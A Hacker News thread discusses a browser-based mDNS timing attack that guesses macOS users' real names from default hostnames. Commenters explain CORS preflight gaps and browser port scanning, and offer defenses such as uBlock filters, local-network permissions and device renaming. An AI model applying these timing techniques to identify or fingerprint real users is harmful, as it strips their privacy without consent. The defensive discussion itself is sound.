[HN Gopher] Brute-forcing a macOS user's real name from a browse...
___________________________________________________________________
Brute-forcing a macOS user's real name from a browser using mDNS
Author : danpinto
Score : 172 points
Date : 2023-07-13 17:24 UTC (5 hours ago)
(HTM) web link (fingerprint.com)
(TXT) w3m dump (fingerprint.com)
| powera wrote:
| If a web application is making dozens of requests to invalid
| domain names, shouldn't the web browser do something about it?
| vogon_laureate wrote:
| This is interesting, well written up and even has a nice proof of
| concept. Nicely done!
|
| A fun countermeasure would be to change the device hostname to
| something like atemptingurl.local that entices the attacker to
| try visiting that website where a webpage is carefully crafted to
| run the exact same technique on them and return:
|
| "Hi [hacker's device name]! Your machine information, IP address,
| geolocation and other fingerprint information has been captured
| and reported to [insert scary cyber agency here]." Even if they
| are seasoned veterans rather than script kiddies, it could at
| least give them a smile.
|
| People need more reasons to smile. :-)
| pyrolistical wrote:
| You would need to be running a http server with CORS allow all.
| You would then also reduce your own security as you are now
| exposed to all the bugs in the chosen http server
| darthwalsh wrote:
| Is there a way to prevent websites from the broader Internet from
| making network requests to my local network? I can't imagine why
| this should be allowed by default.
|
| (Not to suggest bringing back IE's Local Intranet Zone
| permission...)
| nonameiguess wrote:
| My WiFi access points allow me to configure networks so that no
| devices on it are allowed to make requests to the local
| network. I haven't done this with networks used by my PCs,
| though, just for televisions and IoT devices.
| TechBro8615 wrote:
| Brave recently added a feature requiring permission to access
| the local network:
|
| https://brave.com/privacy-updates/27-localhost-permission/
|
| On HN: https://news.ycombinator.com/item?id=36574775
| lagrange77 wrote:
| To avoid confusion, this is not about an internet server making
| requests to your local network, but your local web browser
| making those requests. Although, the javascript executed in the
| browser can be loaded from an internet server, of course.
| jamespwilliams wrote:
| https://developer.chrome.com/blog/private-network-access-pre...
| is one idea being actively worked on in this area
| Arnavion wrote:
| >This content is outdated and no longer accurate. New
| material available.
|
| The "new material" is
| https://developer.chrome.com/blog/private-network-access-
| upd... and changed from restricting all "public websites" to
| only restricting non-HTTPS sites.
|
| It does at least say:
|
| >Restricting private network requests to secure contexts is
| only the first step in launching Private Network Access.
|
| ... so maybe it'll become better later.
| Arnavion wrote:
| uBlock Origin static filter: ||local^$all
|
| This will block all requests to .local, even from .local
| itself. If you want to allow foo.local to talk to itself, say
| because you run a webserver on it, you'll have to add
| additional overrides for each such domain:
| @@||foo.local^$domain=foo.local,all
|
| ... or if you trust your .local entirely to allow any foo.local
| to talk to any bar.local, you can add one override for all of
| .local: @@||local^$domain=local,all
| [deleted]
| collsni wrote:
| This essentially blocks all .local domains from the browser
| user gen or not
| capableweb wrote:
| They generally can't, because of CORS. The only reason this
| "hack" works is because the timing of the rejection is
| different between non-resolving domain request and resolving-
| but-rejected request. But if you run something on
| https://192.168.2.1 it can't be accessed from a web app running
| on https://my-own-domain.com unless the service running at
| 192.168.2.1 allows the "Origin" my-own-domain.com.
| doakes wrote:
| Technically they can make the request. The server will
| receive and respond to the request. CORS is applied by the
| browser which prevents the response from being read. This is
| why CORS doesn't prevent a request from mutating something on
| a server. A CSRF token does.
| aidos wrote:
| Is that true? There's a preflight request that checks with
| the server as to what's allowed and then the browser issues
| the original request if it's ok, right?
| lights0123 wrote:
| First of all, you could probably do a timing attack on
| CORS response, you'd just have to deal with how much
| they're cached.
|
| Depends on the resource request. For example, <img> can
| be used to load remote resources without CORS, since the
| image data isn't shared with JS (trying to read it via a
| canvas marks it "tainted", and errors read requests).
| Meltdown/Spectre breaks this barrier down, which led to
| the introduction of COOP/COEP headers that require CORS
| on remote requests and would break this attack-- _except_
| that you can ask the browser to send requests without
| cookies, re-introducing this timing attack.
| thakoppno wrote:
| There are plenty of browser implementations in things
| like SmartTVs that don't implement CORS and other
| security related features correctly.
| jakear wrote:
| "Simple requests" are not preflighted, such as those that
| do not set any headers (among other qualifications).
|
| https://developer.mozilla.org/en-
| US/docs/Web/HTTP/CORS#simpl...
|
| (Aside, is MDN's href linking broken for everyone or just
| me?)
| zaroth wrote:
| "Simple" requests are sent without a OPTIONS preflight
| check. It's because old style forms could always do a
| cross-origin request, so you have to protect against it
| anyway.
|
| For the full definition of what is a "simple" request:
| https://developer.mozilla.org/en-
| US/docs/Web/HTTP/CORS#simpl...
|
| EDIT: Lol @ jakear making an almost identical response
| with the same Mozilla link.
| tomjakubowski wrote:
| Not only forms, img and link tags supported cross origin
| sources too, with no user action required.
| 1vuio0pswjnm7 wrote:
| Yes. Change the client. For example, I'm using one that does
| not auto-load resources, does not run Javascript and does not
| perform DNS prefetching. There is no way for the website (cf.
| user) to make network requests.
|
| This experiment is of course limited to users who do not change
| defaults, since any MacOS user can easily change their hostname
| to anything they want, and that is quite easy to do, even for
| people who do not read HN. The "real name" might not be real if
| the user has changed the default. Is there any reliable way for
| the website to distinguish "real" from "fake" names in MacOS
| hostnames.
| amarshall wrote:
| uBlock Origin ships with a (default disabled) "Block Outsider
| Intrusion into LAN" blocklist, it has some default exclusions
| though.
| https://github.com/uBlockOrigin/uAssets/blob/01eba0c1445c881...
|
| And, indeed, when I run the PoC from the article, all the
| requests are blocked by uB0.
| pilsetnieks wrote:
| iOS already has a Local Network Access permission, it's
| probably only a matter of time until it appears in macOS as
| well.
| userbinator wrote:
| _In the example above, the difference is four milliseconds for a
| valid address versus five seconds for an invalid one._
|
| This is surprising --- I'd expect a DNS lookup failure to be much
| faster than a default connection timeout which comes after a
| successful DNS lookup.
|
| That said, I've always found the <name>s-mac-xxxx to be a bit of
| an odd choice, especially considering it's from a company that
| advertises privacy as a huge selling point; either they don't
| expect you to use your real name, or this is a case where "user
| friendliness" took precedence. From the privacy perspective,
| Windows' randomly generated hostnames would be better.
| mlyle wrote:
| > default connection timeout which comes after a successful DNS
| lookup.
|
| In addition to the sibling's comment, the other factor is that
| they received a "connection refused" -- RST, not a connection
| timeout.
| liminalsunset wrote:
| The reason users' real names are in the hostnames is possibly
| because of AirDrop. The system appears to use the hostname for
| things like Personal Hotspot and AirDrop, and other types of
| names would probably lead to widespread confusion when it came
| time to share a file.
| rmccue wrote:
| > This is surprising --- I'd expect a DNS lookup failure to be
| much faster than a default connection timeout which comes after
| a successful DNS lookup.
|
| Unlike regular DNS where you're asking a single server at a
| single IP for a yes/no answer, mDNS is multicast, so no single
| server can authoritatively say no+. You can only detect that
| there are no records when the lookup times out because no
| servers have responded.
|
| + Not technically true, a device can say no if it knows it owns
| that name.
| jstrieb wrote:
| A similar type of timing attack can be used to port scan your
| local machine (and other devices on your local network) from your
| browser.
|
| https://github.com/Flu1dTeam/PortScanner
|
| A while ago, eBay got caught doing this.
|
| https://blog.nem.ec/2020/05/24/ebay-port-scanning/
| valventin wrote:
| I'm now thinking how this is related to Wi-Fi sharing. I've
| always renamed my device to avoid leaking my name when I'm
| sharing Wi-Fi. Interesting stuff.
| pyrolistical wrote:
| Could browsers mask this by turning connection refused to a 5
| second timeout in JavaScript but still show the actual error in
| the console (which JavaScript cannot read).
|
| This should only trigger when when JavaScript is making a request
| where CORS would kick in AND connection is refused
| watersb wrote:
| On my macOS box, I run Little Snitch, a nice UI that can be set
| to ask local user for explicit permission before allowing a
| network request.
|
| https://www.obdev.at/products/littlesnitch/index.html
|
| I've occasionally stumbled on it during remote logins, usually
| when an SSH session wants to download something new, like NPM
| requesting NodeJS bits. The text terminal SSH download will
| block; if I figure out it's the Little Snitch then I have to walk
| all the way to my desk downstairs, wiggle the mouse to wake up
| the monitor and unlock the screen saver, and click "Allow" on the
| Little Snitch dialog box.
|
| Works as intended.
|
| BUT by default it's common to set such things to silently allow
| local network requests, so I don't know if such shenanigans in
| the OP would work in my case.
| cyrnel wrote:
| In my case, I couldn't imagine configuring LittleSnitch to only
| allow certain hostnames from my browser. It has a "allow all
| traffic to 53/80/443" rule, otherwise most websites would flood
| me with hundreds of new LittleSnitch popups.
| inferiorhuman wrote:
| You'd think so, but the way I've set it up Little Snitch
| throws up a dialog box when a browser makes errant requests
| but otherwise remains silent. Most recently this caught
| Firefox trying to force DNS over HTTPS despite me having
| disabled it when it first became generally available. I
| suppose leaking DNS requests to Cloudflare isn't the worst
| thing in the world, but it would circumvent the ad blocking
| I've set up locally.
| krackers wrote:
| How _do_ you have it set up? What does errant request mean
| in this case? A request to a domain that you haven't
| allowed before?
| inferiorhuman wrote:
| Ah so I just dug into the rules. What happened was a
| plugin made a DNS request to mozilla.cloudflare-dns.com.
| I've nothing special set up for Firefox, but basically no
| rules for plugin-container, so when a plugin tries to
| make a DNS request Little Snitch pops up an alert.
|
| Not great I suppose, but better than nothing. Generally
| what I'll see for Firefox itself are requests for non
| 80/443 ports.
| doublerabbit wrote:
| I use NetFence [0] on my jail-broken iPhone.
|
| It's surprising what sneaky socket connections applications
| connect too; including bank apps.
|
| [0] https://havoc.app/package/netfence
| ezeki08 wrote:
| hola
| [deleted]
| mrbuttons454 wrote:
| Fortunately for me, my device is often named something like
| "xxxs's MacBook Pro (34)". It's not a bug, it's a feature.
| Syonyk wrote:
| The more time passes, the more comfortable I feel about mostly
| interacting with the internet from a Qubes box, in a disposable
| Whonix/Tor VM, with Javascript disabled...
|
| This is just gross. I mean, not surprising. But appalling in so
| many ways that it's even possible.
|
| If you're not familiar with fingerprint.com, they do "deep user
| profiling" - think "maintaining a constant user ID across
| computers, browsers, OSes, etc." They have a demo on the main
| page that's a little bit creepy in how good it is.
| joiqj wrote:
| As part of my standard (and pretty lame) OPSEC I always change
| the default names that apple gives its devices (like "Joiqj's
| iPhone") to a more generic name (like "iPhone"). Nice to see that
| it was good practice.
| nocsi wrote:
| I do that too. So if we're on the same network and conflict,
| it'll become "iPhone (1)", etc.
| Aachen wrote:
| I use a random person's name because anonymous could be me but
| e.g. Josephine most definitely isn't a bloke.
|
| A lesson learned with early feature phones and Bluetooth names
| in high school
|
| At home my wifis are currently Japanese emojis, but anything
| funny goes
| [deleted]
| wil421 wrote:
| I prefix all my device names with "My". My iPhone, My AirPods,
| My MacBook Air, and so on.
| franga2000 wrote:
| I do the opposite: one of my laptops is named "Peter's iPhone"
| (hint: my name is not Peter, nor do I own an iPhone) and I've
| also set all my Bluetooth to random Bluetooth headset or mouse
| models.
| Arech wrote:
| Bluetooth on my old phone is named as "Pfizer-BioNTech chip
| #<formatteddigits>" :D
| vorticalbox wrote:
| My hotspot on my phone is "FBI van 4"
| eindiran wrote:
| I see this joke frequently when looking at available wifi;
| is this meme a reference to a particular thing (other than
| the FBI having surveillance vans) or did a bunch of people
| just converge onto it?
| noduerme wrote:
| I've never seen it. Maybe it's spreading like a fungus
| from wifi to wifi in certain regions.
| vorticalbox wrote:
| I saw it as a meme years a go. I sadly don't know the
| origin.
| karim79 wrote:
| One of the hotspots in my flat is called "Honeypot1"
| cozzyd wrote:
| I wonder if I can sell my WiFI AP name to some
| advertiser...
|
| "ENJOY COCA-COLA"
|
| or more likely
|
| "TOM BRADY SAYS BUY CRYPTO"
| dev_tty01 wrote:
| In the early days of insecure WiFi, in apartment buildings
| you would see network names like "Don't steal our WiFi Room
| 238!"
| bcx wrote:
| I like this idea, but any sophisticated attacker will ignore
| the Bluetooth names and just pull vendors off the MAC
| addresses. Though it would be interesting if you can define
| the Bluetooth MAC addressees in software to match your fake
| names :)
| accrual wrote:
| I used to do something similar with my router. I would run
| an AP called "Linksys" or something common and give it an
| OUI belonging to Cisco. It probably had no benefit (maybe
| even harmful!), but it was fun to "disguise" my OpenBSD
| router as a common off the shelf router.
| ok123456 wrote:
| I name my computer: 'router'
| doubled112 wrote:
| To be fair, it probably will route if you ask it.
| pndy wrote:
| That reminded me that almost 10 years ago ghacks [1] instructed
| people to add _nomap to their Wifi networks name to avoid these
| being harvested by Google and Mozilla. I wonder if that ever
| worked or still does and if companies stopped collecting that
| information.
|
| [1] - https://www.ghacks.net/2014/10/29/add-_nomap-to-your-
| routers...
| hot_gril wrote:
| The hostname is derived from the admin user's name, which ought
| to also be fake. My "full name," unix username, and hostname
| are all a nice short "me".
| tentacleuno wrote:
| It might sound a bit silly, but I've had pretty good results
| just naming my devices after Pokemon. Whenever I have a new
| device, I open the Pokemon DB[0], choose one at random, and
| then add it to my .csv file of device names -> what they are
| and what role they perform.
|
| [0]: https://www.pokemon.com/uk/pokedex
| johannes1234321 wrote:
| If youlook for a naming scheme: this wiki has you covered
|
| https://namingschemes.com/Main_Page
| jabbany wrote:
| This is not silly at all :-)
|
| Seems pretty in line with the RFC about this
| https://www.ietf.org/rfc/rfc1178.txt
|
| I do something similar but with other mobile/gacha game
| characters since those names are always in abundance. I also
| try to do some kind of correlation with the fictional
| settings too (groups of devices will correspond to meaningful
| in-domain names)
|
| For non-mobile devices like workstations or servers, I also
| tend to directly give FQDN, like (name).(location).(my-
| personal-domain.tld)
| dunham wrote:
| I've been using chili peppers (peri, shishito, ancho, ...)
| for my devices for the last few years. Many years before
| that, I was using named swords (notung, glamdring, sting,
| etc).
|
| Back in college my boss named a sun workstation lab with
| aleutian islands, and another after indonesian islands. (Some
| of those were fun to remember, there was an umnak and an
| unimak.) The servers were named after seas and oceans. We
| tried to name a new lab of windows machines after bugs, but
| the department nixed that.
| varenc wrote:
| I do the same thing but with Star Trek words! I have a
| somewhat logical naming scheme too. Computers are named after
| Star Trek ships (Yorktown), phones are named after handheld
| devices (Phaser), and drives are storage related things
| (Isolinear). And my printers are just named Replicator and
| Synthesizer.
| nneonneo wrote:
| Rather than choosing at random, I like to pick names that
| have some relation to the device in question, e.g. "Pichu"
| for a tiny mobile device, "Snorlax" for the big slow machine,
| "Articuno/Zapdos/Moltres" for three successive powerful
| servers, etc. What's extra fun about Pokemon, if you're
| familiar with the franchise, is that you can pick names based
| on generation, with older generations for e.g. older devices,
| and if you're _really_ familiar with the franchise you could
| even pick names based on types or other characteristics.
| acer589 wrote:
| Very similar here. PCs get Pokemon region names (MacBook is
| Johto), non-PC Ethernet connected devices get Professor
| names, all other devices are Pokemon.
| tentacleuno wrote:
| Oh, I do the same! For instance, zygarde is my 14TB NAS,
| which I consider pretty big. I'm not familiar with the
| franchise though :)
| vogon_laureate wrote:
| I've historically preferred to use Culture series ship names
| (eg. GCU Grey Area, GCU Jaundiced Outlook, etc.), but stopped
| after Elon started naming his SpaceX ships like that.
|
| I then went for Scottish Single Malt names (eg. Laphroaig,
| Jura, etc.).
|
| After quitting alcohol, I've now settled on Douglas Adams
| names (eg. Deep Thought, Grunthos the Flatulent, etc.).
|
| Naming machines is the most fun part of the job.
| oktwtf wrote:
| My go-to is either gods from Norse mythology, or Transformers
| for servers.
|
| I set my iPhone to an emoji, and apparently it's one of the
| emojis that is composed of multiple emojis to render
| correctly. It's fun to see how every device it connects to
| draws the emoji or more likely boxes a little different.
| collsni wrote:
| If only disabling JavaScript didn't disable end user experience
| lol
| cwales95 wrote:
| This is the only thing stopping me from globally disabling
| JavaScript.
|
| I predict in the future through, I'll have no choice but to
| have it off by default due to privacy concerns
___________________________________________________________________
(page generated 2023-07-13 23:00 UTC)